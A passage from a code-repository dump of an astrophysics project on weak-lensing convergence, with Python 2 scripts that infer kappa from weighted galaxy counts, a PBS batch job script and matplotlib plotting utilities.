increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n print np.shape(kappa_)\n del weight\n if (i == 0) and (j == 0):\n id = id_\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n ind1 = np.ones(np.shape(id_)) * j\n ind2 = np.ones(np.shape(id_)) * i\n else:\n id = np.append(id,id_)\n ind1 = np.append(ind1,np.ones(np.shape(id_)) * j)\n ind2 = np.append(ind2,np.ones(np.shape(id_)) * i)\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n return id,ind1,ind2,kappa,weight1,weight2,weight3\n\nif conjoined == 1:\n constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,med_weight1,E_w1_inf,E_w1_sup = readconjoined1_ugriz(weightin1.split('_')[0],weight1_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup) # the constr argument representing 'gamma' (if 'gamma' is used) needs to be used here, so that it can be updated by the code. In addition, all constr arguments must be used because, as I am using multiple radii, global arguments such as constr_weight1 for one radius will correspond to a different global argument for another radius\n id,ind1,ind2,kappa,weight1 = readconjoined1_ugrizJHK(weightin1.split('_')[0],weight1_index,constr_weight1,increment1,med_weight1,E_w1_inf,E_w1_sup)\n del id,ind1,ind2\n\nif conjoined == 3:\n if (weightin1.split('_')[0] == weightin2.split('_')[0]) and (weightin2.split('_')[0] == weightin3.split('_')[0]):\n constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup = readconjoined3_ugriz(weightin1.split('_')[0],weight1_index,weight2_index,weight3_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup)\n id,ind1,ind2,kappa,weight1,weight2,weight3 = readconjoined3_ugrizJHK(weightin1.split('_')[0],weight1_index,weight2_index,weight3_index,constr_weight1,constr_weight2,constr_weight3,increment1,increment2,increment3,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup)\n del id,ind1,ind2\n else:\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,med_weight1,med_weight2,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup = readconjoined2_ugriz(weightin1.split('_')[0],weight1_index,weight2_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup)\n id_rad1,ind1_rad1,ind2_rad1,kappa_rad1,weight1_,weight2_ = readconjoined2_ugrizJHK(weightin1.split('_')[0],weight1_index,weight2_index,constr_weight1,constr_weight2,increment1,increment2,med_weight1,med_weight2,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup)\n constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup,med_weight3,E_w3_inf,E_w3_sup = readconjoined1_ugriz(weightin3.split('_')[0],weight3_index,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup)\n id_rad2,ind1_rad2,ind2_rad2,kappa_rad2,weight3_ = readconjoined1_ugrizJHK(weightin3.split('_')[0],weight3_index,constr_weight3,increment3,med_weight3,E_w3_inf,E_w3_sup)\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,med_weight1,E_w1_inf,E_w1_sup = readconjoined1_ugriz(weightin1.split('_')[0],weight1_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup)\n id_rad1,ind1_rad1,ind2_rad1,kappa_rad1,weight1_ = readconjoined1_ugrizJHK(weightin1.split('_')[0],weight1_index,constr_weight1,increment1,med_weight1,E_w1_inf,E_w1_sup)\n constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup,med_weight2,med_weight3,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup = readconjoined2_ugriz(weightin2.split('_')[0],weight2_index,weight3_index,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup)\n id_rad2,ind1_rad2,ind2_rad2,kappa_rad2,weight2_,weight3_ = readconjoined2_ugrizJHK(weightin2.split('_')[0],weight2_index,weight3_index,constr_weight2,constr_weight3,increment2,increment3,med_weight2,med_weight3,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup)\n if only8 == True: field = 1\n else: field = 8\n for j in range(field):\n for i in range(8):\n id_rad1_ij = id_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n id_rad2_ij = id_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n ind1_rad1_ij = ind1_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n ind1_rad2_ij = ind1_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n ind2_rad1_ij = ind2_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n ind2_rad2_ij = ind2_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n kappa_rad1_ij = kappa_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n kappa_rad2_ij = kappa_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n weight1_ij = weight1_[(ind1_rad1 == j) & (ind2_rad1 == i)]\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n weight2_ij = weight2_[(ind1_rad1 == j) & (ind2_rad1 == i)]\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n weight2_ij = weight2_[(ind1_rad2 == j) & (ind2_rad2 == i)]\n weight3_ij = weight3_[(ind1_rad2 == j) & (ind2_rad2 == i)]\n\n ind1_rad2_ij = ind1_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n ind2_rad2_ij = ind2_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n kappa_rad2_ij = kappa_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n weight2_ij = weight2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n weight3_ij = weight3_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n id_rad2_ij = id_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n\n ind1_rad1_ij = ind1_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n ind2_rad1_ij = ind2_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n kappa_rad1_ij = kappa_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n weight1_ij = weight1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n weight2_ij = weight2_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n id_rad1_ij = id_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n\n sort1 = np.argsort(id_rad1_ij)\n kappa_rad1_ij = kappa_rad1_ij[sort1]\n weight1_ij = weight1_ij[sort1]\n sort2 = np.argsort(id_rad2_ij)\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n weight2_ij = weight2_ij[sort2]\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n weight2_ij = weight2_ij[sort1]\n weight3_ij = weight3_ij[sort2]\n kappa_rad2_ij = kappa_rad2_ij[sort2]\n\n diff = kappa_rad1_ij - kappa_rad2_ij\n if diff.any()!=0: print \"error kappa\" # testing sanity\n\n if (i == 0) and (j == 0):\n kappa = kappa_rad1_ij\n weight1 = weight1_ij\n weight2 = weight2_ij\n weight3 = weight3_ij\n else:\n kappa = np.append(kappa,kappa_rad1_ij)\n weight1 = np.append(weight1,weight1_ij)\n weight2 = np.append(weight2,weight2_ij)\n weight3 = np.append(weight3,weight3_ij)\n del sort1,sort2\n del weight1_ij,weight1_\n del weight2_ij,weight2_\n del weight3_ij,weight3_\n del id_rad1_ij,id_rad1\n del id_rad2_ij,id_rad2\n del ind1_rad1_ij,ind1_rad1\n del ind1_rad2_ij,ind1_rad2\n del ind2_rad1_ij,ind2_rad1\n del ind2_rad2_ij,ind2_rad2\n del kappa_rad1_ij,kappa_rad1\n del kappa_rad2_ij,kappa_rad2\n\nprint(\" Read in %s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\nprint np.shape(kappa)\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n if (weightin1.split('_')[0] == weightin2.split('_')[0]) and (weightin2.split('_')[0] == weightin3.split('_')[0]):\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n else:\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight3 >= round(constr_weight3 * med_weight3) + E3 - increment3/2.0) & (weight3 * med_weight3 < round(constr_weight3 * med_weight3) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight2 >= round(constr_weight2 * med_weight2) + E2 - increment2/2.0) & (weight2 * med_weight2 < round(constr_weight2 * med_weight2) + E2 + increment2/2.0) & (weight3 * med_weight2 >= round(constr_weight3 * med_weight2) + E3 - increment3/2.0) & (weight3 * med_weight2 < round(constr_weight3 * med_weight2) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n med_weight1 = 35 # determined from N_gal\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if unbias == False: kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n else: kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\n#head = 'LOS: %d' % np.array([LOS])\nhead = 'LOS: %d' % np.array([len(kappa)])\nnp.savetxt(output,unbiased_kappa_constrained,header=head,fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3):\n print \"increment2 = \", increment2\nif (conjoined == 3):\n print \"increment3 = \", increment3\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.647519588470459, "alphanum_fraction": 0.7362924218177795, "avg_line_length": 20.27777862548828, "blob_id": "165eafd58f3ac4a0af8162105120a2b05fe01fd3", "content_id": "b1edba818c8d1fb02785cc69b1d7906fec6fdefb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 383, "license_type": "no_license", "max_line_length": 70, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer36.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log36.out\n#PBS -e Log36.err\n#PBS -N 36\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshear.py WFI2033 5 45 23 meds gal gamma\npython inferkappa_unbiasedwithshear.py WFI2033 5 120 23 meds gal gamma\n" }, { "alpha_fraction": 0.5219938158988953, "alphanum_fraction": 0.6320202350616455, "avg_line_length": 92.6236572265625, "blob_id": "2d35d58c42f12f456291ccf652759cd3797468d5", "content_id": "52ccb5584ada411c1baee0ae57c2b5456d480d55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8707, "license_type": "no_license", "max_line_length": 377, "num_lines": 93, "path": "/python/plot_utilities/plotkappabar_conjointgalzoverrgalgamma.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n if i == 0:\n kappastat = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n else:\n x = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n kappastat = np.c_[kappastat,x]\n\nkappastat_45 = np.c_[ kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_120_gal_22.5_med_increments1_1_1_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_z_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_massoverr_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2overr_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3overr_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2rms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3rms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass2overrrms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_mass3overrrms_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_flexion_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_tidal_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_SIS_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_45_SIShalo_120_gal_120_gamma_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nkappastat_120 = np.c_[ kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_45_gal_22.5_med_increments1_1_1_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_z_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_massoverr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2overr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3overr_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2rms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3rms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass2overrrms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_mass3overrrms_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_flexion_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_tidal_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_SIS_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_zoverr_120_gal_120_gamma_120_SIShalo_22.5_med_increments4_4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nN = 16\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.02,0.08])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-z/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol3 = (kappastat_45[1])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[1])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.08])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-z/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects1[0], rects2[0]), ('22.5 120 gal+$\\gamma$ 45 gal+z/r+', '22.5 45 gal+z/r 120 gal+$\\gamma$+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\nplt.savefig('%skappashistbar-conjointgalzoverrgalgamma.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.596726655960083, "alphanum_fraction": 0.6769360303878784, "avg_line_length": 61.95075607299805, "blob_id": "7eba66cf4e4a202d64aba091300af4c5c96ad63f", "content_id": "38baebdc4980cae3b44bbb9ac15744c87c922927", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16619, "license_type": "no_license", "max_line_length": 243, "num_lines": 264, "path": "/python/plot_utilities/plotkappa_handpicked.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.20\nmax_kappa = 1\nmin_kappa_plot = -0.1\nmax_kappa_plot = 0.15\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\n#root = \"/Users/cerusu/Dropbox/\"\n#root = \"/Volumes/LaCieSubaru/kapparesults/\"\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/0408/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n\n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n stddev = (std1 - std1_) / 2\n\n return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal\n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n\n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output: the smoothed signal\n\n see also:\n\n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n\n TODO: the window parameter could be the window itself if an array instead of a string\n NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError, \"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n if x.size < window_len:\n raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n if window_len<3:\n return x\n s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('np.'+window+'(window_len)')\n y=np.convolve(w/w.sum(),s,mode='valid')\n return y\n\nplt.clf()\n\nkappa_0 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_composite_45_gal_45_gamma_45_oneoverr_22.5_med_increments1_1_1_shearwithoutprior.cat\" % root, usecols=[0], unpack=True)\nmedian0,stddev0,kappa_values = 